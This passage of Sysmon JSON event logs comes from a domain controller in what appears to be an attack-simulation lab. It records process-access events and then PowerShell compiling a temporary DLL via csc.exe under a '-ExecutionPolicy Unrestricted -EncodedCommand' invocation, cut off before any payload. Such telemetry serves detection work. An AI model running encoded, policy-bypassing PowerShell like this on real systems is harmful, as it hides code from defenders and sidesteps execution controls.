C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5909,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5910,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5911,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.620\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D8-5F25-0000-00102A9C0800}\r\nTargetProcessId: 3700\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.620","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00102A9C0800}","TargetProcessId":"3700","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:21.042\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nProcessId: 4660\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\mp0obxps.dll\r\nCreationUtcTime: 2020-08-01 06:55:21.042","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:21.042","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\mp0obxps.dll","CreationUtcTime":"2020-08-01 06:55:21.042","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.042\r\nProcessGuid: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nProcessId: 4660\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\mp0obxps.cmdline\r\nCreationUtcTime: 2020-08-01 06:55:21.042","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.042","ProcessGuid":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\mp0obxps.cmdline","CreationUtcTime":"2020-08-01 06:55:21.042","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.058\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-001063A10800}\r\nProcessId: 4856\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\mp0obxps.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nParentProcessId: 4660\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 